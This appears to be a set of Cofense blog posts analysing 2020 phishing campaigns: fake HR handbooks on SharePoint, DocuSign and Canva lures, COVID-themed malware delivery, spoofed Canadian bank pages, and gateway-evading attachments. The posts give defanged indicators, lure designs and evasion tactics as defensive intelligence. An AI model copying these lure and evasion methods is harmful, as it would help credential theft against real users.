Mandatory Internal Company Communications: The Best Time to Phish

By Ashley Tran, Cofense Phishing Defense Center

Companies are awash with numerous corporate communications: open enrollment notifications, new policies and so forth. With this crush of mandatory emails being sent out, threat actors are given the right amount of noise in a user’s inbox to slide their own attacks in without being heavily scrutinized. They are received as “just another HR email” that users may be hasty to quickly read, sign and be done with. The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that aims to harvest Office365 (O365) credentials by disguising as an HR document that must be signed.

Figure 1: Email Body 

The threat actor has attempted to manipulate the “from” fields in the headers of emails for this campaign. As seen in Figure 1, the threat actor has changed the “sender name” field of the headers to appear as though this email was sent from “Human Resources” when in reality the real sender’s email can be viewed in the field next to it: [REDACTED]@ntlworld.com. Every email for this campaign originated from a unique sender from this domain, which suggests that the threat actor utilized compromised accounts to send out this attack. 

The subject for this campaign generally had a theme of “Reminder for [User’s Name] Reviewed Employee Handbook” with the user’s organization email ID being replaced into the subject each time. The context of this email is simple: there is a new employee handbook, everyone must review and sign the acknowledgement of this handbook upon receipt of this email. Interestingly enough, this phishing email was sent out well past the intended due date which simply adds to the urgency of the request – or the threat actor overlooked a variable that needed an update for their template. 

Within the body of the email, the threat actor has noticeably failed to disguise the URL. In fact, it is clear this supposed handbook is hosted on SharePoint in some way. 

The first step of this attack takes place on a SharePoint hosted document that users are redirected to from the email itself. This document, as seen in Figure 2, looks similar to any page one may see in an HR handbook except this one appears to outline the “Remote Working Policy” for the user’s organization. At the end of the described policy there’s a hyperlink to “proceed with acknowledgement” which, if you hover over it as shown in Figure 3, is simply another redirect to the same SharePoint. Except, this time, it directs to a survey hosted on it. 

Figure 2-3: Phishing Page 

Once users click on the link to presumably acknowledge this new policy, they are redirected to an “Acknowledgement Section” seen in Figure 4. On this page, users are prompted to enter their Microsoft credentials as a way to identify themselves, and “for successful submission of acknowledgement.” The threat actor in this case has utilized the Microsoft Excel web app to create and host a survey to harvest credentials, but this is far from uncommon. In fact, a lot of phish tend to utilize this method, exploiting the fact that these Excel surveys are hosted on SharePoint and leverage the trust most users place in the domain SharePoint.com as a whole.

Figure 4: Phishing Page   

Network IOC   IP   
hXXps://netorgft6696135-my[.]sharepoint[.]com/:w:/g/personal/hr_hrhandboook_com/Efj4moxVJidCogbJKcnVuQUBuhnrbvfNNdoq49e7ztvopQ?e=QpXfQL  104[.]146[.]136[.]48 
hXXps://netorgft6696135-my[.]sharepoint[.]com/:x:/r/personal/hr_hrhandboook_com/_layouts/15/WopiFrame.aspx?guestaccesstoken=EiYjYkpbbdYnGHOdsn0%2fA9ofWLWdjKnx0g5atRlMHTE%3d&docid=1_1c88d073e14d04676b3274b6a31ae8900&wdFormId=%7B72299567%2DF59D%2D40B1%2D8CAA%2D6E6DED3D7529%7D&action=formsubmit  104[.]146[.]136[.]48 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

“We’re Grateful For The Trust!”

By Kian Mahdavi, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has found a phishing campaign that aims to yield users credentials by exercising references to DocuSign. At first glance, the email is kept short and sweet in a bid to lure the user into viewing the invoice. Proofpoint and Microsoft’s Secure Email Gateway (SEG) both detected and failed to stop the phishing campaign. It’s claimed that the success of this attack was the skillfully concealed legitimate links within the (.PDF) attachment.    

 Here’s what happened 

Figure 1: Email body 

The subject of this phish is vague “Invoice attached,” guiding the user to learn more. The senders display name is William G. Kern, however the email address begins to read as “bill.kern”; could this be a possible mistake from the attacker? One would expect the display name and email address to correspondingly match with one another. As we pan down, we note the name of the attachment is in numerical order, with no indication of a detailed transaction, calling the attention of inquisitive users.   

Following on from the above, the email features just two sentences, first thanking the user for their “business” and second, encouraging the user to contact the sender by means of telephone should there be any discrepancies. The norm would be to touch base with one another via email, providing full anonymity and leveraging their spoofing techniques, which is a perfect social engineering tactic from the attacker. 

Figure 2 – Attached PDF

The above screenshot displays what the attachment looks like when opened. Behind the “authentication required” message is a document with a substantial amount of text, including two bulky signatures. Perplexed users are led to suppose they are steps closer to unveiling the invoice.

It’s important to note the importance that the subdomain “myemail” plays in this attack, which is hosting the initial malicious webpage, rather than the compromised root domain “constantcontact[.]com.” Consider the social engineering dialect toward the end of the URL below. It’s a troubling yet effective methodology that attackers use to spread phishing sites.

“hXXps://myemail[.]constantcontact[.]com/The-latest-news-for-you.html?”

Figure 3 – Redirect Malicious DocuSign Link

Upon clicking the hyperlinked “Review” button in Figure 2, the website “myemail[.]constantcontact[.]com” opens up within the default browser. Because of the legitimate service, such campaigns almost certainly pass email authentication techniques such as DKIM/SPF. Better still, the built-in SSL certificates shown in the address bar allow the domain to become “trusted,” presenting the green padlock at the beginning of the URL. It appears the domain had been purchased and hosted from namecheap[.]com,  a web-hosting platform.

Figure 4 – Payload Phishing Site

The sequel to this campaign is a somewhat similar “DocuSign” phishing site inviting users to enter their credentials.had.

DocuSign does not require an account to log in. The document would be sent via email from dse@docusign[.]net, allowing recipients to review the document, implement a signature and complete the signing process.

Upon logging in, the user is under the impression he or she has been authenticated via a legitimate DocuSign. At this point, the user’s credentials are unfortunately in the hands of the threat actor.

Network IOCs

IPs

hXXps://myemail[.]constantcontact[.]com/The-latest-news-for-you.html

208[.]75[.]122[.]131

hXXps://domainnameonline[.]net/

199[.]188[.]200[.]202

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.
sample phish spoofs salesforce to deliver credential phishing link

Phish Found in Proofpoint-Protected Environments – Week Ending October 16, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage 

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: Malware, BazarBackdoor

DESCRIPTION:  This phishing attack is seen in Proofpoint environments and uses the subject of a termination list to entice recipients click on a Google Docs link and deliver BazarBackdoor via PDF link.

TYPE: Remote Access Trojan

DESCRIPTION: This phishing attack is seen in Proofpoint environments and uses a Customer Complaint-themed email and HTML attachment to deliver a Remote Access Trojan.

TYPE: Credential Theft

DESCRIPTION: This phishing attack is seen in Proofpoint environments and uses an overdue invoice themed email to deliver a credential stealer via a PDF attachment.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Threat Actors Use Canva Templates for Credential Phishing

By Ala Dabat Cofense Phishing Defense Center

Over the past weeks, the Cofense Phishing Defense Center (PDC) has seen an increase in the number of attackers deploying Australian design platform Canva in their attempts to trick unwitting recipients into giving up their login credentials for a number of well-known email platforms. Canva lets users design and create graphically driven content such as presentations and other visual content, which has allowed malicious actors to move away from platforms such as Google Docs and Dropbox to harvest sensitive user data through powerfully driven phishing campaigns.   

Examples of these attacks vary, although we have seen an increase in the number of malicious PDF files with embedded links that redirect targets to phishing websites hosted on Canva. Canva is in turn used to host image files used as a launch pad, redirecting targets to malicious websites designed to harvest user credentials via cloned landing pages.  

We have noticed that this method of delivery has been employed by hackers to bypass traditional SEG filtering by keeping the content of the email very simple so as to fly under the radar of detection engines. This use of attachments and simply designed phishing emails is nothing new; however we are seeing an increase in the number of Canva hosted malicious images employing this method of delivery. 

Figure 1: Email with malicious PDF attachment 

The attachment is a malicious PDF file purporting to be from Microsoft, which then loads via the recipients browser as a local file with an embedded link redirecting the recipient to the malicious Canva image landing page. 

Figure 2:  Malicious PDF redirecting targets to Canva hosted malicious image

Once the recipient has clicked on the link, they are redirected to an image hosted on Canva, which includes a link directing to the phishing landing page. Note that as a method of garnering further legitimacy, the image claims to have been scanned by antivirus giving the recipient a further sense of security.   

Figure 3: “OneDrive” landing page hosted on Canva’s design platform 

Once the recipient clicks the link to view the bogus PDF document, they are then redirected to an official looking Microsoft webpage (Figure 4) where they are encouraged to enter sensitive data in order to view the document.  


Figure 4: Redirect to an official looking site purporting to be Microsoft OneDrive for business. 

Aside from attachments the PDC has also seen different variations in the methods of delivery, including phishing emails encouraging recipients to click on a malicious link to view documents; it redirects them to a malicious image hosted on Canva.  

 In the figure below, we can see an example phishing email without a malicious attachment. 

Figure 5:  A Canva hosted attack with embedded link claiming to be a new ‘Fax Document’ 

Once recipients click the malicious link, like the previous example, they are redirected to a Canva landing page with a malicious image.

Figure 6: Malicious landing page  

Canva is being used by malicious actors as the launchpad for common phishing tactics, applying well known attack vectors and convincing aesthetics for enhanced credibility. 

Figure 7: Multiple email provider login pages for credential harvesting 

In this instance we opted to log in via the bogus Microsoft Outlook login optionOnce the recipients have entered their credentials, the credentials are harvested to a database. 

Figure 8: Example login page, Microsoft Outlook, with credible aesthetics 

Canva is probably aware of the problem, removing malicious files as and when they’re found but, as our research has concluded, many of these malicious files have remained on Canva’s hosted platform for hours and even days at a time. Sites, such as Google where hackers have traditionally hosted their phishing emails, appear to be a lot faster in detecting and removing them, which is another reason threat actors have begun to exploit the Canva platform. 

Indicators of compromise:  

Network IOCs  IPs  
hXXps://9812343[.]fls[.]doubleclick[.]net/activityi;src=9812343;type=retar0;cat=flood0;ord=7358195098176  172[.]217[.]15[.]102 
hXXps://www[.]canva[.]com/design/DAEHygBxHno/INiENewnEJagw51VOIkz7w/view  104[.]18[.]215[.]67 

104[.]18[.]216[.]67 

hXXps://thelivingoodcenter[.]com/cs/office365-RD62/offaccess/  192[.]249[.]114[.]34 
hXXps://www[.]seoera[.]net/7hd7n3ydnbd734/Driveee/Drive/  192[.]254[.]138[.]161 
hXXps://saynodeserve[.]com/cardinal/m/f/  160[.]153[.]203[.]183 

 

 

“All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Trump COVID-19 Diagnosis Leveraged in Campaigns

By Dylan Duncan and Max Gannon

Threat actors were quick to leverage the news that President Donald Trump tested positive for COVID-19. Cofense Intelligence has observed a recent COVID-19-themed campaign that successfully reached users in enterprise environmentsTaking advantage of recent headlines and the upcoming U.S. election, this campaign makes use of secure email gateway (SEG) evasion tactics and anti-analysis techniques to deliver advanced malware to end users protected by leading SEGs. The threat actors targeted multiple industries, reaching users across a variety of sectors in the United States and Europe. 

The emails entice recipients by leveraging the president’s health status mere weeks before the election and claiming to provide “secret” information on COVID-19. Threat actors have created multiple phishing emails based on these themes, similar to Figures 1 and 2. 

Figure 1: Phishing email leveraging the president’s medical condition.  

Figure 2: Phishing email leveraging COVID-19. 

Anti-analysis Malware in Secure Environments  

These phishing emails deliver embedded Google Docs URLs that are often permitted by SEGs. The URL leads to a document with another link rather than directly downloading malicious content. While Google is quick to remove directly hosted malware, it is often much slower to remove content that provides a link to malicious content. The Google doc (Figure 3) displays an image of the Google logo with a hyperlink that redirects to a Google wrapped payload URL. This wrapping is important, as threat actors can use it to prevent analysts from downloading malware directly from the threat actor-controlled page. If certain conditions are met, the payload URL then downloads a password-protected XLS file. This password protection ensures that, without access to the original email, any downloaded files are not revealed to reverse engineers. The password-protected Microsoft Excel Worksheet abuses an organization’s reliance on Microsoft Excel macros to download and execute BazarBackdoor or ZLoader once macros are enabled.

The choice between BazarBackdoor or ZLoader is determined by the initial link embedded in the email. Both of these malware families feature extensive anti-analysis functionality. BazarBackdoor is a stealthy malware downloader commonly affiliated with the developers of TrickBot. It uses specialized network communications to avoid detection, and to contact its command and control locations. ZLoader is a banking trojan that uses web injects to steal credentials and sensitive information. 

Figure 3: Google Document from the embedded URLs.

Threat actors continue to adapt phishing campaigns to reflect currentaffairs themes, and turn to the tactics, techniques and procedures that yield success in delivering phish to targets in environments protected by SEGs. Once a phishing email successfully reaches an inbox, the human factor is the final defense against compromise. Cofense Intelligence will continue to report on phishing campaigns reaching end users and the tactics, techniques and procedures that evade modern SEGs.  

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.
sample phish spoofs salesforce to deliver credential phishing link

Phish Found in Proofpoint-Protected Environments – Week Ending October 4, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage 

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: Malware, ZLoader 

DESCRIPTION: This phish plays on the sensitive idea of insider details.  When a recipient clicks on the Google Docs link ZLoader is delivered via an Office macro- laden spreadsheet downloaded from an embedded URL. 

TYPE: Malware, AZORult Stealer 

DESCRIPTION: This phish relies on the familiarity people have with order confirmations sent through email.  In this case, an Excel document is used to deliver the AZORult Stealer via an embedded URL. 

TYPE: Quaverse Remote Access Trojan 

DESCRIPTION: This is another example of using an order hook to have someone open the order information in a zip file.  This attachment delivers the Quaverse Remote Access Trojan. 

TYPE:  Malware, Bazar Backdoor 

DESCRIPTION: This phish conveys there is important financial information that needs to be viewed.  When the Google Doc is clicked the BazarBackdoor is delivered via embedded URLs. 

TYPE:  Keylogger, Agent Tesla Keylogger 

DESCRIPTION: Another finance-themed phish in Spanish entices the recipient to click on the link where the Agent Tesla Keylogger is delivered via an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Environments Protected by Proofpoint, Microsoft, Cisco, Mimecast and Symantec

By Mark Zigadlo, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) sees tens of thousands of phishing emails that bypass secure email gateways (SEGs) every month. The PDC is an advanced managed detection and response (MDR) service that can remediate these malicious emails from mail environments within minutes.   

A few examples of phishing emails found in environments protected by SEGs can be found here. The ineffectiveness of SEGs continue to increase business risk daily. And the solution is more than high production-value awarenesstraining modules. You need a combination of people and technology to combat the innovativeness of attackers to quickly reduce/remove the business risk. 

Here’s a recent and real story about a phishing campaign (and its quickly morphed successor) that bypassed SEGs from Proofpoint (PFPT), Microsoft (MSFT), Mimecast (MIME), Cisco (CSCO) and Symantec (SYMC).   

The suspicious email below arrived in my inbox. I reported it to the PDC using Cofense Reporter.

Figure 1 – Phishing Email 

I received a response eight minutes later saying the email was malicious (BazarBackdoor malware) and removed from my mailbox. Amazing speed, eight minutes to remove the threat and stop the attack!

Detection

Drilling down further, I saw Cofense’s network effect was in full action in the PDC. The network effect is the unique combination of people and technology that allows one participant in the network to benefit from threats found by another participant in the network. At Cofense, we have over 25 million people contributing to make the network effect an unparalleled security tool. In this case, the PDC had detected similar attacks for 15 other PDC customers (people in the network), which enabled the PDC to respond with lightning speed throughout the day.

Here is the kill chain/timeline for the first customer that received this phishing campaign.

Twelve minutes between the first report and removal of malicious emails from user mailboxes, but the story gets better.   

The PDC uses a key feature of Cofense Vision called Auto Quarantine which looks for new emails matching the ones just identified and quarantined. Over the next 24 minutes, 22 additional emails were detected and removed by Cofense Vision. 

Response & Remediation 

As we know, attackers are constantly innovating to bypass security technology. This is why you need the combination of people and technology to reduce/remove the risk. This case was no different. Two hours after the first phishing campaign was identified and stopped, a slightly modified campaign was launched against the same customer. The PDC jumped back into action again. 

More amazing results. Twenty-two minutes between the first report of the modified campaign and removal of malicious emails from user mailboxes through Cofense’s Phishing Defense Center.

The Phishing Defense Center harnesses phishing intelligence from the frontlines of the world’s most active phishing campaigns to quickly protect everyone in the network. 

To learn how you can efficiently identify and remove phish that have bypassed your SEG, click here for a free demo of the Phishing Defense Center. 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Twelve Flavors of Phish: Canadian Workers Targeted With Fake Covid-19 Relief Deposits

By Jake Longden and Elmer Hernandez, Cofense Phishing Defense Center

Financial aid programs continue to be popular targets in the midst of the COVID-19 pandemic, with government relief grants a particularly great one to exploit.  

The Cofense Phishing Defence Center (PDC) has observed a recent phishing campaign in Canada that aims to harvest banking credentials and other personal information from 12 different banking institutions. This was achieved by preying on employees who were expecting COVID-19 relief grants in the form of the CERB (Canada Emergency Response Benefit). These funds are supposedly sent via an electronic transfer from Interac, a legitimate Canadian interbank network. 

With multiple world governments providing such grants, and millions of people relying on these as their main source of sustenance, adversaries will continue exploiting such dependence. 

CERB Deposit

The email purports to be a notification from Interac’s e-transfer service, indicating that the Canada Revenue Agency (CRA) has made a CERB deposit of $1,957.5 CAD (approx. $1,463 USD). A fictitious expiration date is included in an attempt to instill a sense of urgency.

The CERB scheme gives financial support to employed and self-employed Canadians who have been affected by the COVID- 19 pandemic. It offers $2,000 CAD (approx. $1,490 USD) for a four-week period.

Figure 1 – Email Body 

Header

The SPF fail in the headers (Figure 2) indicates that the email is likely spoofed, and the IP address suggests that it came from a potentially compromised device using the University of South Florida network (Figure 3). The choice of the name ‘cra-cerb’ in the address is used to add credibility to the email.

Figure 2 – SPF Fail 

Figure 3 – USF IP Address 

A Phish of 12 Different Flavors

The first landing page the phish visits is an impersonation of the CRA. It has working links in both French and English like a legitimate site from the Canadian government. Once the user has selected their language choice, they will be redirected to an impersonated Interac e-transfer site in said language.

Figure 4 – CRA Spoofed Site  

Once in the spoofed Interac e-transfer site (Figure 5)the user must choose their personal bank from twelve different options in order to receive the deposit. All of these banks are actual members of the Interac network, which suggests attention to detail from adversaries: 

  • ATB Financial 
  • Bank of Montreal (BMO) 
  • Canadian Imperial Bank of Commerce (CIBC) 
  • Desjardins 
  • Laurentian Bank 
  • Meridian 
  • National Bank of Canada 
  • Royal Bank of Canada (RBC) 
  • Scotiabank 
  • Simplii Financial 
  • Tangerine 
  • TD Canada Trust 

Figure 5 – Spoofed Interac Page 

Next, the recipient is taken through a series of spoofed pages for the corresponding bankwith some offering both English and French versionsAll pages reside within compromised website of a Washington, DC area businessThe URL paths vary depending on the bank, but follow the following format:  

hxxps://lincolnrestaurant-dc[.]com/interca/{unique 32 character string}/bank/{bank name}/{html or php file} 

Although no two options are identical, most of the twelve spoofed banks ask for similar details: 

  • Usernames 
  • Card Numbers 
  • Passwords 
  • Security Questions and Answers 
  • Personal Information (PI) (Full Name, Date of Birth, Email, etc) 

Scotiabank (English) was chosen to showcase an example of the entire phish process. The initial page the user is presented with is a standard login page asking for credentials, notice the slight typo of the word “sign” on the “Sing in button (Figure 6). 

Figure 6 – Scotiabank Sign in 

The next page asks for sensitive PI and card information (Figure 7). The user is then asked for Security questions and answers (Figure 8), which might falsely provide the reassurance that some form of multi-factor authentication is being employed. The combination of PI such as a Social Insurance number, credit card numbers and MFA questions could form a fairly solid base for identity theft/impersonation. Once submitted a final page confirms the funds will be deposited in 48 hours (Figure 9).

Figure 7 – Scotia PI and Card Info 

Figure 8 – Scotia MFA Security Questions 

Figure 9 – Deposit Successful 

Figures 10 through 20 show the login pages for the remaining eleven spoofed banks.  

Figure 10 – ATB 

Figure 11 – BMO 

Figure 12 – CIBC  

Figure 13 – Desjardins  

Figure 14 – Laurentian  

Figure 15 – Meridian  

Figure 16 – National Bank 

Figure 17 – RBC  

Figure 18 – Simplii  

Figure 19 – Tangerine  

Figure 20 – TD  

Indicators of Compromise

Malicious URL:

hxxps://lincolnrestaurant-dc[.]com/interca

Associated IP:

108[.]167[.]182[.]39

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Trend: Credphish Links Stuffed in Benign Attachments Are on the Rise

By Kian Mahdavi, Cofense Phishing Defense Center

While it’s true that most enterprise-directed phishing is credential phishing, that doesn’t mean attackers have completely abandoned attachments. The days of malware-laden attachments are dwindling. You’re not going to find dangerous embedded macro or .VBS in 2020 at the same frequency observed in 2016. Attackers are using attachments, more now than ever, to deliver embedded URLs. Why? Because secure email gateway (SEG) vendors have emphasized auto-scanning and wrapping URLs in the body of emails.

During the last few weeks, the Cofense Phishing Defense Center (PDC) has observed a significant uptick in credphish URLs stuffed in attachments successfully bypassing several commercial SEGs. The attachment types are varied, but many are commonly used in normal business communications – .DOC .HTML, .HTM, .XLSX, .PDF, etc. Check out our REAL phishing threats samples here for a complete list.

If you think stuffing credphish URLs in attachments to sidestep automated URL scanning is a no-brainer for attackers, we agree. You’d be surprised at the number of SOAR vendors demoing automated-phishing-analysis playbooks that fail due to this simple attacker adaptation. This phenomenon isn’t going to slow down.

Here’s a common example of a campaign reported to the PDC by a vigilant user:

Figure 1: Email Body

There has been a recent rash – 500 variants – of this campaign reported from our users via the Cofense Reporter Button. The campaign originated from an assumed compromised account from a legitimate business. Originating from a legitimate business surely added to a sense of legitimacy. Luckily, the recipient asked themselves: “Am I expecting to receive a document from this sender?”

Upon opening the attached .XLSX document, Microsoft Excel loads, prompting the user to click an embedded image using “trusted” brands to spruce up the legitimacy of the ruse. Once clicked, the attack redirects to the phishing landing page requesting the user’s credentials.

Figure 2 – The underlying “Open” link doesn’t take the victim to OneDrive

Once credentials have been supplied, the phishing website redirects the user to the authentic “office[.]com” to make the victim feel like the whole experience was legit.

Figure 3 – Phishing landing page 

Figure 4  Redirect to authentic office[.]com webpage 

Figure 5 below displays the HTML source code with POST command when a user types in their credentials and attempts to login. In fact, their personal data gets forwarded to the attacker via a pre-configured PHP script.    

Figure 5 – POST command forwards users’ credentials to the above URL 

Slipping credential phish URLs into innocuous attachments is going to frustrate SEGs for years to come because of the endless file formats that support HTML, compounded by all the clever ways attackers can obfuscate those URLs from automated analysis. Cofense customers avoided a disaster because of their commitment to upgrading their wetware.

Indicators of Compromise: 

Network IOC   IP 
hxxps://noshgosh[.]com/9833636833/mau [.]html  192[.]185 [.] 181 [.] 28 
hxxps://runyourrideonwater[.]com/a1/shareaumine/login[.]php  192 [.] 185 [.] 148 [.]151 

 

File name:  Copy of mstglobal.xlsx  
MD5:  519615b29249d944f7564eb4f2d1feac 
SHA256:  ff9f56c61230a45ab662e7e2b650ec834ba4194cbcbc7cfcbdd06c0b046b64f6 
File Size:   36.2 KB 

Want to know the breakdown of phishing attacks by type? Make sure you look out for our annual report.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

 

sample phish spoofs salesforce to deliver credential phishing link

Phish Found in Proofpoint-Protected Environments – Week Ending September 27, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. This week we see a plethora of links – most of them using trusted services – reach customer inboxes. When technology is unable to block phish because of the risk of blocking legitimate emails, it’s well-trained users that detect and report threats.

sample phish spoofs the irs to deliver a link to buer loader

TYPE: Malware – Buer Loader

DESCRIPTION: This phish uses the element of surprise and urgency with a tax theme to lure the recipient into clicking the link. The link looks trustworthy, since it’s hosted in Google Docs. It leads, however, to an install of the Buer Loader. Cofense has been writing about the use of Google Docs in phishing attacks since 2017.

sample phish uses a payment theme to deliver a link to credential theft

TYPE: Credential Theft

DESCRIPTION: Leveraging a finance theme, this phish uses trustworthy Microsoft OneDrive URLs. Okay, so they’re not quite trustworthy, since they’ll lead the recipient to a Microsoft OneNote document that redirects to a credential harvesting site. Where did you want to go today?

sample phish uses a shipment theme to deliver a link to netwire rat

TYPE: Malware – NetWire RAT

DESCRIPTION: Spoofing a logisitics company, this phish promises shipping information but hides malicious links behind innocent-looking images. Clicking the link leads the recipient to install GuLoader, which installs the NetWire Remote Access Trojan.

sample phish delivers a google doc link to buer loader that installs bazarbackdoor

TYPE: Malware – Buer Loader

DESCRIPTION: If you’re thinking this phish looks awfully familiar, it’s not you. Aside from the change to an employee termination theme, this attacks leverages the exact same tactic as our first example – a Google Docs-hosted threat. In this case, the Buer Loader goes on to install the BazarBackdoor malware. These attacks should get you all fired up.

sample phish delivers xlsx attachment leading to agent tesla keylogger

TYPE: Malware – Agent Tesla

DESCRIPTION: Using a purchase theme, this phish offers to place an order for seafood but delivers a malicious Microsoft Excel spreadsheet with a CVE-2017-0199 to CVE-2017-11882 download chain to the Agent Tesla Keylogger. I wonder if they wanted that seafood shipped COD?

sample phish delivers credential phishing link using a document theme

TYPE: Credential Theft

DESCRIPTION: Spoofing a healthcare organization, this document-themed phish delivers a link to a credential harvesting site. Although redacted to protect the innocent, this sample used a very legitimate-looking message with signature block and legal disclaimer.

sample phish spoofs salesforce to deliver credential phishing link

TYPE: Credential Theft

DESCRIPTION: This phish uses urgency and the trappings of a popular SAAS platform to lure the recipient into clicking the link. In this case, the links lead to a credential harvesting site. Although not a panacea, Multi Factor Authentication (MFA) is still an effective way to protect your organization.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.